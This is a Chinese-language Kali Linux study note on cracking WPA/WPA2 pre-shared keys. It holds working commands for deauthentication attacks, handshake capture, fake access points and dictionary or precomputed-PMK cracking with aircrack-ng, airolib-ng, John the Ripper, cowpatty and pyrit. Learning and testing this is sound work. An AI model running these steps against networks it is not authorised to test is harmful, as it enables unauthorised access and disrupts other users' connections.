Kali linux 学习笔记(三十四)无线渗透——WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit) 2020.3.13
前言
本节学习对WPA的攻击
主要有PSK攻击和AIROLIB、JTR、cowpatty、pyrit等工具的使用
1、WPA PSK攻击
- WPA不存在WEP的弱点
- 只能基于字典暴力破解
PSK破解过程
- 启动monitor
- 抓包并保存
- deauthentication攻击获取4步握手信息
- 字典暴力破解
实践
AP设置为WPA,AES加密
airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wpa wlan0mon
#抓包,-c指定信道,--bssid指定侦听的AP,-w写入wpa文件
aireplay-ng -0 2 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon
#deauthentication攻击让他重连,来尽可能多的抓包,-0指定攻击次数,-a指定AP,-c指定客户端
#成功抓取握手信息
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
#用自带字典暴力破解,还有以下这些
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/
#/usr/share/wordlists/rockyou.txt.gz
2、无AP情况下的WPA密码破解
- 启动monitor
- 抓包并保存
- 根据probe信息伪造相同ESSID的AP
- 获取4步握手信息的前两个包
- 字典暴力破解
实践
tmux分窗
窗口1 伪装AP,下面二选一
airbase-ng --essid leon -c 11 -z 2 wlan0mon #伪装AP,-z 2指定TKIP,即WPA1
airbase-ng --essid leon -c 11 -Z 4 wlan0mon #伪装AP,-Z 4指定WPA2
窗口2 侦听抓包
airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wpa wlan0mon #-c指定信道,--bssid指定侦听的AP,-w写入wpa文件
进行密码破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap #wpa这个文件就是抓包,可以用wireshark打开看看
#这时未成功连接,只有前面两个包,有可能破解不了
3、AIROLIB破解密码
原理
- 计算生成不变的PMK
- PMK在破解阶段用于计算PTK
- 通过完整性摘要值破解密码
- SQLite3数据库存储数据
实践
echo kifi > essid.txt
airolib-ng db --import essid essid.txt #创建数据库db
airolib-ng db --stats #当前数据库状态
airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt #导入密码
airolib-ng db --batch #批处理,计算出PMK
aircrack-ng -r db wpa-01.cap #破解
4、JTR破解密码
- 基于规则扩展密码字典
- 获取手机号段利用JTR规则增加最后几位数字
配置文件/etc/john/john.conf
vi打开
在[List.Rules:Wordlist]最后
加一段[0−9][0-9][0−9][0-9][0−9][0-9][0−9][0-9]
john --wordlist=yd.txt --rules --stdout #根据yd.txt生成密码字典
john --wordlist=yd.txt --rules --stdout | aircrack-ng -e kifi -w - wpa-01.cap #破解,-w -指定前面输出的内容
5、cowpatty破解密码
- WPA通用破解工具,多平台
(1)密码字典破解
cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi #用密码字典
(2)PMK破解
genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi #生成PMK
cowpatty -r wpa-01.cap -d pmkhash -s kifi #用PMK破解
6、pyrit破解密码
- 与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度
- 除了CPU,还可以用GPU
- 本身支持抓包获取四步握手,无需airodump
pyrit -r wlan0mon -o wpapyrit.cap stripLive #抓取WPA四次握手
pyrit -r wpapyrit.cap analyze #对抓来的包进行分析
pyrit -r wpa.cap -o wpapyrit.cap strip #如果是用airodump抓的包,需要转换再分析
(1)密码字典破解
pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b EC:26:CA:DC:29:B6 attack passthrough
#-b指定AP的MAC
(2)数据库模式破解
pyrit eval #查看默认数据库状态
pyrit -i /usr/share/john/password.lst import passwords #导入密码字典
pyrit -e kifi create essid #指定essid
pyrit batch #计算生成PMK,发挥GPU能力
pyrit -r wpapyrit.cap -b EC:26:CA:DC:29:B6 attack db #破解密码
结语
WPA安全性远高于WEP
破解难度高很多
pyrit工具比较好用
Kali linux 学习笔记(三十四)无线渗透——WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit) 2020.3.13相关推荐
- Cty的Linux学习笔记(十四)
Linux学习笔记--第十四篇 环境变量配置文件: /etc/profile:预设了几个重要的变量,例如PATH,USER,LOGNAME,MAIL,INPUTRC,HOSTNAME,HISTSIZE ...
- Kali linux 学习笔记(十九)缓冲区溢出——linux(crossfire) 2020.3.1
前言 上一篇在windows下用SLMail的漏洞实现缓冲区溢出 这次在Linux下用crossfire的漏洞实现缓冲区溢出 crossfire穿越火线 多人在线rpg游戏 1.9.0版本接受入站so ...
- tensorflow学习笔记(三十四):Saver(保存与加载模型)
Saver tensorflow 中的 Saver 对象是用于 参数保存和恢复的.如何使用呢? 这里介绍了一些基本的用法. 官网中给出了这么一个例子: v1 = tf.Variable(..., na ...
- Kali linux 学习笔记(十六)主动信息收集——防火墙识别(scapy、lbd、waf) 2020.2.25
前言 通过检查回包,识别端口是否经过防火墙过滤 大概有四种情况 当然误差存在一定误差 1.scapy 根据上述四种情况,可以写个脚本 fw_detect.py #!/usr/bin/python im ...
- Kali Linux学习笔记—无线渗透 WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)
Kali linux 学习笔记 无线渗透--WPA攻击(PSK破解.AIROLIB.JTR.cowpatty.pyrit) PSK破解原理 PSK破解过程 实验步骤--使用字典rockyou.txt ...
- OpenCV学习笔记(十四):重映射:remap( )
OpenCV学习笔记(十四):重映射:remap( ) 图像的坐标映射是通过原图像与目标图像之间建立一种映射关系,这种映射关系有两种,一种是计算原图像任意像素在映射后图像的坐标位置,另一种是计算变换后 ...
- Mr.J-- jQuery学习笔记(三十二)--jQuery属性操作源码封装
扫码看专栏 jQuery的优点 jquery是JavaScript库,能够极大地简化JavaScript编程,能够更方便的处理DOM操作和进行Ajax交互 1.轻量级 JQuery非常轻巧 2.强大的 ...
- python数据挖掘学习笔记】十四.Scipy调用curve_fit实现曲线拟合
#2018-03-28 10:02:08 March Wednesday the 13 week, the 087 day SZ SSMR python数据挖掘学习笔记]十四.Scipy调用curve ...
- Spring Security技术栈学习笔记(十四)使用Spring Social集成QQ登录验证方式
上一篇文章<Spring Security技术栈开发企业级认证与授权(十三)Spring Social集成第三方登录验证开发流程介绍>主要是介绍了OAuth2协议的基本内容以及Spring ...
- tensorflow学习笔记(三十二):conv2d_transpose (解卷积)
tensorflow学习笔记(三十二):conv2d_transpose ("解卷积") deconv解卷积,实际是叫做conv_transpose, conv_transpose ...
最新文章
- matlab生成多组多维高斯分布数据
- CodeForces - 1486C2 Guessing the Greatest (hard version)(二分+交互)
- php配合jade使用,前端自动化系列(四)之jade预编译html
- ae绘图未指定错误怎么办_早晨深化设计研究院47个快捷键50个CAD技巧助你神速绘图,玩转CAD...
- Service Mesh 在华为公有云的实践
- linux 安装rpm包时遇到error:Failed dependencies解法方法
- 背景图片平铺(HTML、CSS)
- python基础知识——函数(中)
- 如何在C中调用C++的示例代码
- Springboot自行车在线租赁系统毕业设计源码101157
- 腾讯地图获取地址的经度和纬度
- iai控制器服务器ON信号,IAI 直角坐标机械手 IAIssel控制器
- AMAZON SP API Feed
- 一名小程序员的2021年度 个人总结
- java购物结算_Java编写网上超市购物结算功能程序
- 连续均匀聚苯乙烯纳米微球造孔剂/氨基化聚苯乙烯微球/羧基功能化马来酸酉干(MA)聚苯乙烯微球
- 学习云客户端安装流程
- 小红书app复制链接转换为可直接访问链接
- 无水磷酸三钠行业调研报告 - 市场现状分析与发展前景预测
- python读取txt文件如何按数字分隔_python 读txt文件,按‘,’分割每行数据操作